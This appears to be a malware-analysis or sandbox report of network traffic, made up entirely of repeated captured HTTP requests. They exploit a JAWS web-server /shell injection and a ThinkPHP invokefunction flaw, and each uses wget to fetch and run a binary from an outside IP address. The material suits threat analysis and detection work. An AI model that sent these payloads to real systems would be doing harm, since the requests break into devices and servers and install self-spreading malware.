      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
